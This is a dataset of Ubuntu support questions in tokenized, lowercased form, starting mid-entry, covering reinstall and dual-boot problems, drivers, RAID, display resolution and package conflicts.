file system : vfat boot sector type : windows xp : fat32 boot sector info : no errors found in the boot parameter block . operating system : boot files : /bootmgr /boot/bcd drive : sda disk /dev/sda : 160.0 gb , 160041885696 bytes 255 heads , 63 sectors/track , 19457 cylinders , total 312581808 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sda1 * 2,048 310,503,423 310,501,376 83 linux /dev/sda2 310,505,470 312,580,095 2,074,626 5 extended /dev/sda5 310,505,472 312,580,095 2,074,624 82 linux swap / solaris drive : sdb disk /dev/sdb : 8004 mb , 8004304896 bytes 255 heads , 63 sectors/track , 973 cylinders , total 15633408 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sdb1 * 63 15,633,407 15,633,345 c w95 fat32 ( lba ) '' blkid '' output : device uuid type label /dev/sda1 94108733-fa78-47f3-b04d-31fb682e442e ext4 /dev/sda5 4c57bb9e-d799-4c06-a5ad-c1ddbcbb46d3 swap /dev/sdb1 6b1c-f558 vfat mount points : device mount_point type options /dev/sda1 / ext4 ( rw , errors=remount-ro , commit=0 ) /dev/sdb1 /media/6b1c-f558 vfat ( rw , nosuid , nodev , uhelper=udisks , uid=1000 , gid=1000 , shortname=mixed , dmask=0077 , utf8=1 , showexec , flush ) sda1/boot/grub/grub.cfg : so how do i retrieve either ( in order of preference ) dual boot with windows 7 win7 complete reinstall . n.b i have no data that requires saving and i have the windows device drives and a ubuntu 11.10 install package hurdles to overcome : it 's acer one laptop with no dvd/cd drive installing win7 from a flash drive bombs out as it can not recognise any system devices as the drivers are not installed/accessible . my gut feeling is that i a ) need to install ubuntu fresh and repartition the drive but i am unsure how much damage it will do .. or b ) partition the drive from within ubuntu and stick windows files on there and reallocate the pointer .. but not sure how to make it visible on boot as c : \ ? ?
109139	help with reinstall windows xp instead of ubuntu	i have installed ubuntu 11.10 on a hp pavilion dv3 laptop for my wife , but she ca n't get on with it . i love the interface personally , but she wants to go back to xp since it keeps crashing and wo n't boot up unless i put a boot stick in . the hard drive was a new one ( the old one died ) . i have tried booting from an xp disc , but it just defaults to ubuntu . i would like to remove ubuntu entirely and then use the xp disc as a boot . how do i clean the hard drive of everything ?
109145	why ca n't i reserves more than 3gb ram for java app using 11.10 32-bit ?	my system reports 8gb , but when i try and reserve 6.5gb heap space , or even 4gb for a java program it fails . is this because i installed the 32-bit version ? fails to allocate heap java -xmx3072m -jar { ... } starts ok , but app runs out of memory . java -xmx2048m -jar { ... }
109147	can see the nautilus menu in desktop when using gnome shell	when i update my system several weeks ago , i started to see the nautilus menu in my desktop ! i saw this because i had a transparent gnome shell panel . today i re installed ubuntu and things seems to be ok. then i installed a shell extension which will hide the top menu ... when its hidden , i can again see the menu ! anyone know how to get rid of it ? check the attached image ... its a gnome shell environment in ubuntu . the top panel is hidden !
109149	minimalcd network autoconfiguration fails	i 'm attempting to get an ubuntu minimalcd install working without much luck.. working from the guide posted here i can get the cd to boot and i select the command-line installer option . after selecting my language and keyboard settings the installer fails on configure the network with dhcp with the message : network autoconfiguration failed . your network is probably not using the dhcp protocol . alternatively , the dhcp server may be slow or some network hardware is not working properly . < continue > i can verify that my network is using dhcp and that the network hardware on the device is functional . the device in question is the ebm-lx800 ( amd geode lx800 5.25â mini module with amd geode lx800 + cs5536 chipset ) which uses the 10/100base-tx fast ethernet compatible : realtek rtl 8101l ethernet interface . from here if i enter tty and modprobe -- list | grep net i see a very large list of drivers , some of which look like they may be the correct driver for my device however i 'm not sure which to choose or how to ensure the driver is available for the network configuration . note : i have not listed the drivers from the modprobe -- list command because there are way too many to copy them all by hand .
109150	what should the total space be for 4 3tb drives in raid10 configuration ?	i just configured 4 3tb drives in a raid-10 configuration but the total disk space in the raid is 4tb . i used the following guide to setup the raid-10 , raid-10 intall . should n't the size if the raid-10 array be 6tb ? according to this raid calculator it should be . anyone have any idea of what might have gone wrong in the install ? thanks in advance for your time .
109153	what is ubuntu 's software raid controller partition size limitation ?	does anyone know what the partition size limitation is for the ubuntu software raid controller ? if its 2tb , does anyone know how to increase that limitation to 3tb ? this is in regards to a question i posted on server fault . thanks for your time ?
109156	problem with team fortress 2	when i 'm trying to play team fortress 2 by playonlinux after loading server there is error , ,internal error invalid parameters received '' . how can i solve this problem . sorry for my english .
109162	no audio or video on lenovo thinkpad t410	i just installed ubuntu 11.10 on my lenovo thinkpad t410 . the inbuilt webcam is not displaying any video using cheese . also i have no sound at all when playing video or audio . when the ubuntuos boots up i do n't even hear the sound at start up . please how do i get audio and video to work ? i have checked the sound settings , and in the hardware type my sound card reads - `` internal audio 1 output/1 input - analog stereo duplex '' can i please get some assistance with installing the proper drivers or getting both audio and video to work ? thank you .
109163	openssh server : rejected send message	when i tried to restart the ssh server on my ubuntu box , i got me @ me-one : ~ $ service ssh restart restart : rejected send message , 1 matched rules ; type= '' method_call '' , sender= '' :1.63 '' ( uid=1000 pid=3354 comm= '' restart ssh `` ) interface= '' com.ubuntu.upstart0_6.job '' member= '' restart '' error name= '' ( unset ) '' requested_reply= '' 0 '' destination= '' com.ubuntu.upstart '' ( uid=0 pid=1 comm= '' /sbin/init '' ) i realized that i had n't sudo-ed me @ me-one : ~ $ sudo service ssh restart ssh start/running , process 3386 why did n't the first attempt throw an error like permission denied or something similar . am i overriding the error when running as root and implicitly ignoring the warning/error ? or is it just bad programming by the openssh developers ?
109171	compile mono without .net 2 support	i have an application that is targeted to .net framework 4.0 , and i am building an installer script for linux that needs to build a custom version of mono which is installed to the user 's home directory ( or location of choice ) . there is some documentation on unsupported advanced mono compile options that states you can specify -- with-profile2=no in the configure command . i tried this and it did not work , so looking further into the configure script , i see that nothing is actually done with this option . i have not yet been able to determine if there is a compiler flag i can set or if there is another option that would let me skip building .net 2 runtime files since it takes about 20-30 minutes to build mono . the configure command i was trying : ./configure \ -- prefix=/opt/mono \ -- with-profile2=no \ -- with-moonlight=no \ -- with-profile4=yes \ -- enable-minimal=reflection_emit this is ubuntu 10.10 , and i am building mono from source using the latest version 2.10.8 .
109174	how to get one song to repeat in rhythmbox ?	i want one song to repeat . unfortunately , this is not possible . the only possible solution is to create a playlist with that one song and play it on loop , but this is not convenient . are there any plugins or tweaks to get this functionality ?
109175	aufs root file system on usb flash	i configured aufs as a root file system on usb flash drive by this article . so the first brunch is real root fs and it is read-only . the second brunch fs is in memory and it is read-write capable . both brunches combined in one file-based copy-on-write union and mounted at / . all things seams working well , but network interface . while the ubuntu 11.10 oneric 3.0.0-16-server x86_64 booting i see next message : waiting network configuration after it boots eth0 do n't bring up : rootubuntu : ~ # ifconfig lo link encap : local loopback met addr:127.o.o.1 mask:255.o.o.0 inet6 addr : : :1/128 scope : host up loopbaci < running mtu:16436 metric:1 rx packets:0 errors : o dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped : o overruns : o carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0.0 6 ) tx bytes:0 ( 0.0 6 ) restarting networking not helping : root @ ubuntu : ~ # /etc/init.d/networking restart * running /etc/init.d/networking restart is deprecated because it may not enabie again some interfaces * reconfiguring network interfaces ... dhclient3 : error while loading shared libraries : libc.so.6 : can not open shared object file : no such file or directory failed to bring up etho . the library libc.so.6 remains the same place at /lib/x86_64-linux-gnu/libc-2.13.so and link /lib/x86_64-linux-gnu/libc.so.6 for it . when i boot normally ( without aufs as root fs ) all things go well again . how to fix it ?
109176	how to get the full command line used to launch a process	eclipsed launched a process for me , and i 'd like to see the full command line used . i tried `` ps auxwww '' , but it seems to truncate the path to 4096 characters , is there any way to get ps to stop truncating the path , or to use another tool to find the full path ?
109179	how to use my internet 3g of my blackberry with my computer ?	i 've bought a blackberry bold 9700 , and i have 3g service . how can i use the internet with my computer ?
109180	mysterious hard disk failure ?	my new 1,5 tb ext4 hard disk makes mysterious noises and fails to read and write . but not always . sometimes it just works . but then i get those following errors . does anyone know a solution for that or is my new wd caviar black 1.5 tb hard disk broken ? [ 551.162286 ] ata7 : sata link down ( sstatus 0 scontrol 310 ) [ 551.162294 ] ata7.00 : link offline , clearing class 1 to none [ 551.178223 ] ata7 : eh complete [ 551.190802 ] ata7 : exception emask 0x10 sact 0x0 serr 0x4040000 action 0xe frozen [ 551.190807 ] ata7 : irq_stat 0x00000040 , connection status changed [ 551.190811 ] ata7 : serror : { commwake devexch } [ 551.190818 ] ata7 : limiting sata link speed to 1.5 gbps [ 551.190822 ] ata7 : hard resetting link update mainboard p7p55d le : http : //www.asus.de/motherboards/intel_socket_1156/p7p55d_le/ # specifications
109186	how to make sure other users ca n't see my files ?	i do n't want the others users of my computer to be able to open my home folder . i 'm the administrator , how can i do this ?
109191	using ubuntu one with usb modem rather than router	the ubuntu one control panel thinks that there is no internet connection when in fact there is ( via speedtouch usb modem ) . how can i proceed ?
109193	computer freezing when i try to add an attachement to an e-mail	my computer froze when trying to attach file to e-mail and when i restarted my computer a black screen came up display this with different numbers in front of it each time it was repeated multiple times . `` buffer 1/0 error on device sr0 logical block 0 '' '' end_request : 1/0 error sector 0 ''
109196	how to remove extra swap partitions at ubuntu install menu ?	i found my computer to have 11 swap partitions originated by previous fresh installs . i want to delete them , and i do n't mind doing a fresh install again . the problem is that i am a newbie and i do n't know how to edit partitions to delete swaps in the ubuntu 11.10 install menu . where do i have to clic ? delet ? change ?
109197	reuse device name for ebs volume in amazon ec2 instance	i 'm running an amazon ec2 instance ( ubuntu server version : 11.10 ( 64 bit ) ) and am having problems with re-attaching ebs volumes to previously used device names . for example , i launch the instance and attach a volume to /dev/xvdh . this will mount , operate perfectly and then unmount and detach without issues . however , if i try and re-attach this volume ( or any other ) to /dev/xvdh , it just gets stuck in the `` attaching '' state and will only detach with the -- force option . there are a ton of posts about this on the aws forums but none have a solution . could this be an issue with ubuntu ? are devices just `` used up '' until a reboot or is there some way of freeing them up once removed ?
109198	why ca n't my pc and iphone find each other via bluetooth ?	i 've got bluetooth enabled on both the computer and the iphone , and both devices can see my bluetooth headset so this confirms that bluetooth itself works . but when i let either device look for other devices , they find nothing ( when the headset is off ) . i 'm using 11.10 with all the latest updates . i have not installed any special or additional bluetooth software ; only whatever ubuntu provides by default .
109203	ubuntu says that filesystem is read only when trying to use sudo or su	i am currently using ubuntu 11.10 . my hdd has been frequently used for more than 5 years now . when i try to use the sudo command , or execute a command as root , i receive a message stating that the filesystem is read-only . for example , when i try to run sudo apt-get install gnome-tweak-tool , i receive the following output : sudo : ca n't ipen /var/lib/sudo/aaron/0 : read-only file system w : not using locking for read only lock file /var/lib/dpkg/lock e : unable to write to /var/cache/apt/ e : the package lists or status file could not be parsed or opened i have heard that ubuntu will make the filesystem read only because of disk errors . after checking my hard drive with disk utility , i discovered that it has 7 bad sectors . disk utility also warned about imminent disk failure . is this kind of thing normal , and can/should i make the filesystem writeable again ? or should i simply replace my hard drive ?
109208	how do i add new wallpapers ?	i have ubuntu 11.10 installed and want to download and install additional wallpapers on my desktop . how do i do this ?
109209	sun-java6-plugin has no installation candidate ?	i 'm trying to install sun-java6-plugin . it supposedly in the `` partner '' repo . i have : deb http : //archive.canonical.com/ lucid partner in /etc/apt/sources.list and ran apt-get update . i get : apt-get install sun-java6-plugin sun-java6-fonts reading package lists ... done building dependency tree reading state information ... done package sun-java6-plugin is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package sun-java6-plugin has no installation candidate does the package no longer exist , or do i need a different repo ?
109210	could not calculate the upgrade on upgrade from 11.04 to 11.10	i 'm trying to upgrade from 11.04 to 11.10 , but get this error : an unresolvable problem occurred while calculating the upgrade : e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . this can be caused by : * upgrading to a pre-release version of ubuntu * running the current pre-release version of ubuntu * unofficial software packages not provided by ubuntu if none of this applies , then please report this bug using the command 'ubuntu-bug update-manager ' in a terminal . to attempt to fix this , i disabled all software sources not provided by ubuntu , and i uninstalled all software not provided by ubuntu in the ubuntu software center . synaptic tells me i still have natty/restricted nvidia-current , nvidia-glx-180 , and nvidia-glx-185 installed . could these last packages be what is holding back the upgrade ? i hesitate to uninstall them because i 'm worried that doing so may significantly reduce my screen resolution . what can i do to find out what packages are holding back the upgrade ? update : running sudo apt-get remove libglib2-ruby1.8 fixed the problem and allowed the upgrade to complete successfully .
109213	flash videoplayer not working properly	flashs on websites are shown without any problem on both firefox and chrome . however , flash video players are not working properly ; just background color and nothing at all . interestingly youtube player is an exception .
109215	resize disk partition on remote vm server	i 'm running ubuntu server 10.04 on a remote server as a vm . i only have access to the vm . the vm is assign a disk space of 20gb , however the drive is currently only partitioned to use about 4.7gb . i know that you can use livecd to repartition a drive using gparted . how would you go about doing that on a remote vm ? ( since the partition is also the startup volume ) # fdisk -l disk /dev/sda : 21.5 gb , 21474836480 bytes 255 heads , 63 sectors/track , 2610 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00074164 device boot start end blocks id system /dev/sda1 * 1 618 4959232 83 linux partition 1 does not end on cylinder boundary . /dev/sda2 618 653 280577 5 extended partition 2 does not end on cylinder boundary . /dev/sda5 618 653 280576 82 linux swap / solaris
109222	conflict between ffmpeg and mplayer	i have been dealing with this issue for a long time now . i compiled a patched version of ffmpeg offered by this company . the problem arises whenever i install mplayer via apt-get . before the installation , ffmpeg works without problems , here i give you the normal ffmpeg output with some compilation details : ffmpeg version git-n-28463-gc5dcb3d , copyright ( c ) 2000-2011 the ffmpeg developers built on mar 1 2012 17:09:15 with gcc 4.5.2 configuration : -- enable-libfmp4 -- enable-nonfree -- enable-librtmp -- enable-libx264 -- enable-gpl -- enable-version3 -- enable-postproc -- enable-libfaac -- enable-libopencore-amrnb -- enable-libopencore-amrwb -- enable-libtheora -- enable-libvorbis -- enable-libxvid -- enable-x11grab -- enable-swscale -- enable-shared libavutil 50 . 39 . 0 / 50 . 39 . 0 libavcodec 52.114 . 0 / 52.114 . 0 libavformat 52.103 . 0 / 52.103 . 0 libavdevice 52 . 3 . 0 / 52 . 3 . 0 libavfilter 1 . 76 . 0 / 1 . 76 . 0 libswscale 0 . 12 . 0 / 0 . 12 . 0 libpostproc 51 . 2 . 0 / 51 . 2 . 0 hyper fast audio and video encoder usage : ffmpeg [ options ] [ [ infile options ] -i infile ] ... { [ outfile options ] outfile } ... use -h to get full help or , even better , run 'man ffmpeg' now if i do install mplayer : $ sudo apt-get install mplayer reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : libtorque2 libgdcm2.0 libxcb-keysyms1 libopenmpi1.3 libgl2ps0 libcddb2 libdvbpsi6 libupnp3 libxcb-randr0 libiso9660-7 libnuma1 libibverbs1 libtar libvcdinfo0 libebml3 libmatroska3 libsdl-image1.2 use 'apt-get autoremove ' to remove them . the following extra packages will be installed : libavcodec52 libavformat52 libavutil50 libpostproc51 libswscale0 suggested packages : mplayer-doc netselect fping the following new packages will be installed : libavcodec52 libavformat52 libavutil50 libpostproc51 libswscale0 mplayer 0 upgraded , 6 newly installed , 0 to remove and 45 not upgraded . need to get 0 b/8,592 kb of archives . after this operation , 19.0 mb of additional disk space will be used . do you want to continue [ y/n ] ? y selecting previously deselected package libavutil50 . ( reading database ... 229546 files and directories currently installed . ) unpacking libavutil50 ( from ... /libavutil50_4 % 3a0.6.4-0ubuntu0.11.04.1_i386.deb ) ... selecting previously deselected package libavcodec52 . unpacking libavcodec52 ( from ... /libavcodec52_4 % 3a0.6.4-0ubuntu0.11.04.1_i386.deb ) ... selecting previously deselected package libavformat52 . unpacking libavformat52 ( from ... /libavformat52_4 % 3a0.6.4-0ubuntu0.11.04.1_i386.deb ) ... selecting previously deselected package libpostproc51 . unpacking libpostproc51 ( from ... /libpostproc51_4 % 3a0.6.4-0ubuntu0.11.04.1_i386.deb ) ... selecting previously deselected package libswscale0 . unpacking libswscale0 ( from ... /libswscale0_4 % 3a0.6.4-0ubuntu0.11.04.1_i386.deb ) ... selecting previously deselected package mplayer . unpacking mplayer ( from ... /mplayer_2 % 3a1.0~rc4.dfsg1-1ubuntu3_i386.deb ) ... processing triggers for man-db ... setting up libavutil50 ( 4:0.6.4-0ubuntu0.11.04.1 ) ... setting up libavcodec52 ( 4:0.6.4-0ubuntu0.11.04.1 ) ... setting up libavformat52 ( 4:0.6.4-0ubuntu0.11.04.1 ) ... setting up libpostproc51 ( 4:0.6.4-0ubuntu0.11.04.1 ) ... setting up libswscale0 ( 4:0.6.4-0ubuntu0.11.04.1 ) ... setting up mplayer ( 2:1.0~rc4.dfsg1-1ubuntu3 ) ... processing triggers for libc-bin ... ldconfig deferred processing now taking place mplayer is now installed correctly , but calling the ffmpeg executable i now get : ffmpeg ffmpeg : relocation error : /usr/local/lib/libavfilter.so.1 : symbol av_expr_free , version libavutil_50 not defined in file libavutil.so.50 with link time reference googling around i found that removing some libraries solves the problem , so i do : $ sudo apt-get purge libavutil-dev libavutil50 libavutil-extra-50 reading package lists ... done building dependency tree reading state information ... done package libavutil-dev is not installed , so not removed package libavutil-extra-50 is not installed , so not removed the following packages were automatically installed and are no longer required : libopenal1 libtorque2 libgdcm2.0 libxcb-keysyms1 libbluray0 libsvga1 libopenmpi1.3 libgl2ps0 libcddb2 libdvbpsi6 libupnp3 liblzo2-2 libxcb-randr0 libiso9660-7 libnuma1 libibverbs1 libtar libvcdinfo0 libebml3 libmatroska3 libsdl-image1.2 use 'apt-get autoremove ' to remove them . the following packages will be removed : libavcodec52* libavformat52* libavutil50* libpostproc51* libswscale0* mplayer* 0 upgraded , 0 newly installed , 6 to remove and 45 not upgraded . after this operation , 19.0 mb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 229649 files and directories currently installed . ) removing mplayer ... purging configuration files for mplayer ... removing libavformat52 ... purging configuration files for libavformat52 ... removing libavcodec52 ... purging configuration files for libavcodec52 ... removing libswscale0 ... purging configuration files for libswscale0 ... removing libpostproc51 ... purging configuration files for libpostproc51 ... removing libavutil50 ... purging configuration files for libavutil50 ... processing triggers for man-db ... processing triggers for libc-bin ... ldconfig deferred processing now taking place but of course , that removes mplayer . so it seems like i have to choose between either one , and i actually need to work with both tools . is there a way around this ? can anyone explain me the problem ? thanks in advance nelson r. păšrez
109228	how do i get a realtek wireless usb airlink101 awll5088 working ?	i am running ubuntu 11.10 , 32bit . i ordered them a realtek airlink101 awll5088 based upon the relative ease for linux installation . i am having trouble installing the drivers . i copied the drivers to /usr/src/ and ran sudo ./install.sh from that director listed above . i have tried ndiswrapper , and allowing the default drivers , but with no luck . it seems to continue to try and use the default free drivers , even though i have blacklisted them using the guide described here . there was no error , i was asked which card i was using . i looked at the packaging and at the support page , and guessed number 2 , allowed to finish , and rebooted . it continued detect the wireless network after the reboot , but would never complete the connection . i would appreciate any feedback . i am kind of stuck trying to figure this out .
109231	installing the normal kubuntu-desktop after removing the version from ppa	i installed this kde version with the commands from this link ( on my kubuntu 11.10 ) and after that i removed it with your commands because it freezes all the time . but when i log in in kunbutu it is always this version . i tried with purge kubuntu* to remove all kubuntu pieces , but when after that i install kubuntu-desktop again it is again the newest ppa version . can you help me to return to then normal kubuntu-desktop ? when i will install it with synpatic , i always find only the version from ppa , but i removed ppa sources ! thank you karin
109232	how to backup a windows share to another windows share using rsync ?	i have two windows shares mounted and i would like to be able to backup the first into the second . the shares are found on a windows server 2003 machine . i was able to copy one folder to another windows share # 1 , i figured i could use the same command . rsync -azvv ~/mounts/share1 ~/mounts/share2 . i figure that 's probably not the right way , but i have n't been lucky in finding something useful in google .
109235	how to install linberry for blackberry bold ?	i 've bought a blackberry bold 9700 , and i need to connect it to my computer , reading in some blogs knew linberry , but when i looked for it in software center i did n't find it . could someone explain me how to install it by terminal or if it has another name . help
109239	can not boot livecd on amd geode lx800	when trying to boot from the livecd ( ubuntu 11.10 i386 desktop ) after a long wait i get stopped at busybox . running exit from busybox exits , then errors , then reloads busybox . this is the error : target filesystem does n't have requested /sbin/init here is a long youtube video of my install in process.. the first two menus are taken over by glare but they are showing that i am using the default 'mode ' and 'options ' for the install . i have run a memtest ( one pass , took an hour ) and it came back good . i have also done a md5 check on my disc image , which was also good . i have checked the disc from the boot menu and it came back good . i can admit that my search on the supported hardware came back a bust but i also could not find a few things i knew were supported so i 'm assuming my use of the tool was poor at best . upon a quick search of google i found that people did have luck getting ubuntu to load ( albeit older versions ) on this board . can i get any suggestions on how i can overcome this problem ? should i try an older version ? and if so is there really a point in going pre 10.04 ?
109243	repair corrupted keyring	i believe i have corrupted all of my keyrings while trying to add keyrings for extra repositories . i foolishly moved some keyring files around in a console , and now my system is in a state such that apt-get and ubuntu software center do n't work any more . ubuntu software center displays the following error message when trying to update packages : could not calculate the upgrade an unresolvable problem occurred while calculating the upgrade . please report this bug against the 'update-manager ' package and include the following error message : 'e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . ' is there something i can do to repair my keyrings ? alternatively , if i absolutely have to just reinstall everything , is there an easy way to do this ?
109249	how do i configure the launcher to `` dodge windows '' ?	i do n't like the auto hide launcher for it is too annoying for me . the launcher stays hidden and to reveal it , the mouse pointer has to be moved to the default hot spot . i 'd instead like to have the hide to dodge windows previously available in ubuntu 11.10 . how do i change back to this behaviour ?
109250	how do i set up a server with a realtime kernel ?	i have installed ubuntu server 11.04 on a machine with size 4gb . as , the ubuntu server 11.04 does not support real time kernel by default , i need compile a real time kernel on ubuntu desktop 11.04 which is on my laptop and then transfer the new kernel to the server machine . here 's comes a few questions to accomplish this task : first of all , i need to install a minimal real time kernel ( with only wireless driver ) , for making the kernel support rt , i know i need to get the related rt patch . the main part is how to set up the minimal kernel . you know , i already tried installing a rt kernel several times , but it just failed . after all , i guess it was because i was missing some of the special modules the kernel needs to load at start up . now , can anyone having the same experience tell me how to do it ? as my space in the main machine is only 4gb , and ubuntu server has already occupied most of its space , i was told to compile the new kernel on another machine n then transfer the image file to the server and then compile it . i do n't know how to do this ! ! i already installed a new kernel on my laptop , but i do n't know how i can transfer it to the server , even if i transfer the bzimage , what about the driver modules and other things ?
109254	not enough space in file system	hi i 'm a new ubuntu user currently on 11.10 oneiric ocelot and i have problem with file system available space . i installed it inside windows to another hdd i have . i have 2 disks 1 60gb ssd and 1 1tb common one partitioned in 2 : 100gb for ubuntu and the rest-other as storage . now when i go to places `` computer '' i can see a total of 4 disk references : 1.0tb hard disk e. opening is my storage partition everything ok. next are my 2 windows partitions on my ssd no problem with that either . finally file system partition which reports the following thing upon properties click : 431,858 items , totalling 141.1 tb ( some contents unreadable ) this ca n't be since my partition that has ubuntu is a fair 100gb space and this thing reads 141.1 tb which is insane . what 's happening here ? thanks in advance , therman
109255	i ca n't select updates in update manager	ubuntu 11.10 is installed , and i have updated my system via ubuntu software centre , and after the update 3 updates remain in the list . but i am unable to select them , the tickboxes can not be checked and ubuntu software centre gives no error when i try to check . also , below it says `` there is no update to be installed '' and even though there seems to be updates install updates button is unclickable . what should i do in order to install these updates ?
109258	finding leaking memory ?	i have a system running a java program and i believe it or something else is leaking memory . when the program is monitor for its memory use it de-allocates the memory as it is suppose to . but after a day or two the system ram is full and kernel kills the process . are there any tools i can use in linux to monitor memory linux and find the leak or force clearing of memory ? free only seems to show me info .
109260	how do i get an intel ultimate 6300-n working ?	first off i upgraded my wifi card from a ralink to a intel ultimate-n 6300 and also had to install a modded bios so the computer would accept the wifi card . i can get my wifi to connect in windows but when i try to install any linux tried ubuntu 's , crunchbang , archbang etc . the wifi card is recognized but when i try to connect to any router i get an endless loop of it trying to connect . if the router had a wep key it will go in an endless loop for about 45 seconds then re ask for the password if the router doesnt have a password it will just sit in an endless loop saying connecting . the computer is a dv6-6135dx with a amd chipset has the 3500m processor in it 6620g integraded graphics with a 6750m graphic card also . could it be a conflict between the amd chipset and the wifi card needing a intel chipset driver ? here is some more detail . 03:00.0 network controller [ 0280 ] : intel corporation centrino ultimate-n 6300 [ 8086:422b ] ( rev 3e ) subsystem : intel corporation centrino ultimate-n 6300 3x3 agn [ 8086:1101 ] flags : bus master , fast devsel , latency 0 , irq 53 memory at f0200000 ( 64-bit , non-prefetchable ) [ size=8k ] capabilities : < access denied > kernel driver in use : iwlagn kernel modules : iwlagn also have done : sudo rmmod iwwlagn sudo modprobe iwlagn bt_coex_active=0 this allows me to connect to the wifi but only on that session of ubuntu if i restart i have to go back into terminal and retype also i am noticing slow speeds after doing that . any suggestions ? what i 've tried : according to this bug these cards might have a hard time when in 802.11n mode . doing a sudo modprobe iwlagn 11n_disable=0 just makes it get stuck in an endless loop trying to connect .
109268	unable to install win xp nor win 7 after installing ubuntu 11.10	i 'll try to make this scenario as clear as possible . laptop specs hp dv6-2189la : 500 hdd 4gb ram intel i7 personal specs - linux newbie running for the first time . quite confused : ( i had windows 7 x64 , decided to start fresh new so i planned on formatting . since i use it for work and did n't require it for another week , i did n't rush into installing win 7 immediately as i wanted to try ubuntu for quite a while . 1 ) downloaded ubuntu 11.10 2 ) burned iso to cd 3 ) installed ubuntu using the full hdd of 500gb erasing win7 4 ) ubuntu ran awesome ( especially for me being a linux newbie from scratch ) i used ubuntu for a while , but now i need to get back to work with win 7 . tried running the installation cd for win 7 and it just skips to ubuntu without loading . checked bios , tried other discs , even tried the disc on another computer and it works . since that did n't work , i tried running win xp . this cd does load , it starts loading files , drives , kernel , blah blah and before even getting to install it blue screens with error 0x0000007b . i already used gparted and created up to 250 gb space for windows . formatted to ntfs . i really donâ´t know what do now . i 've tried almost everything i know within my knowledge . i could say i 'm an advanced pc user , but i bumped into the linux wall starting from scratch . all suggestions will be appreciated . thanks !
109273	web capture like adobe acrobat pro ?	i 'm looking for something ubuntu that compares to web-capture in adobe acrobat pro . it 's a feature that asks for a url , whether to follow links , and if so how many levels to follow . it then goes to the website , and imports the links into a pdf . i need this feature , if it 's available , in ubuntu . what i 'm needing to do is to type in a url that has nothing but links to tiff document images , all the pages to the document being on that page . i ca n't find a way to automate the process of getting and importing into pdf . any suggestions ?
109278	which is better for running ubuntu ?	the samsung np305v5a-a04us or the gateway nv57h57u
109279	minidlna is running as root . is this bad ?	i installed minidlna from the tarball . the version using apt-get install minidlna is a little older and does not have compatibility features i need . i auto start minidlna by executing sudo update-rc.d minidlna defaults . however , i notice it runs as root . is this bad ? how do i get it to run as my user instead of as root .
109282	tried every solution but my monitor resolution is still stuck at 640x480	i have problems getting my viewsonic vx2025wm lcd monitor with ubuntu 11.10 . i have another monitor which works well ( although in vga mode ) , but this one refuses to go beyond 640x480 . i 'm trying to set it at 1680x1050 ( 60hz ) . i 'm using the latest nvidia drivers on a geforce gtx 560 ti . i tried using xrandr using this solution : http : //www.linuxjournal.com/content/guerrilla-tactics-force-screen-mode-ubuntu but i get the following error : failed to get size of gamma for output default if i list the available modes , none are higher than 640x480 . i tried a few solutions proposed here : monitor will not be detected , stuck at 640x480 forcing the resolution in xorg.conf does n't work , but the monitor always falls back to 640x480 . i also tried using nvidia-xconfig -- mode=1680x1050 but it does n't work either . i tried deleting my xorg.conf file , but the monitor still falls back to 640x480 . this guy has the exact same monitor as me but a slightly different problem ( he can set it higher than 640x480 , but not 1680x1050 ) : getting screen resolution correct with nvidia drivers here is my current xorg.conf : # nvidia-xconfig : x configuration file generated by nvidia-xconfig # nvidia-xconfig : version 295.20 ( buildmeister @ swio-display-x86-rhel47-05.nvidia.com ) mon feb 6 22:13:40 pst 2012 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` unknown '' horizsync 28.0 - 33.0 vertrefresh 43.0 - 72.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 subsection `` display '' depth 24 modes `` 1680x1050 '' endsubsection endsection fyi , the monitor has always worked without any problem with any version of windows . i 'm not saying windows works better , i 'm just saying the monitor works normally with another os . thanks for any help . i 'm really going crazy here !
109293	editing with nano , alt is caught by the window menus , how can i fix that ?	the alt key is used for many useful commands , but unfortunately it 's caught by the terminal window to activate the window menus ( file , edit , ... ) . i would like to either force the terminal window to pass alt to the terminal or get nano to use some other key/combination ( i 'm using gnome terminal 2.32.1 ) . ps : there is a related , but different question here where it 's pointed out that ctrl + right arrow can not be bound to `` move forward a word '' .
109297	how do i install an equalizer in rhythmbox ?	previous i have never used rhythmbox by default because it seemed to be lacking in features to me . just my personal opinion . with rhythmbox back in 12.04 will ubuntu give it some attention to give it some usability one thing that was majorly missing on my last use of rhythmbox was an equalizer which is the most basic of requirements for an audio player let alone a preamp . i have searched and found that on the rhythmbox website the plugin is available but in the plugins menu of rhythmbox it is not there . i searched google and there are many guides from 2009 trying to install the equalizer . there is nothing recent and one would assume this would be a default plugin , there is no point after all searching for cover art if your music does n't sound right . how can i easily install the equalizer in 12.04 ?
109302	how will union mounts be possible in 12.04 ?	i noticed today that ubuntu 12.04 will not include aufs . what , if anything , will be available to facilitate the creation of union mounts ?
109306	how to upgrade to beta from alpha or to beta 2 from beta 1 ?	how to upgrade to 12.04 beta 1 from 12.04 alpha 2 ?
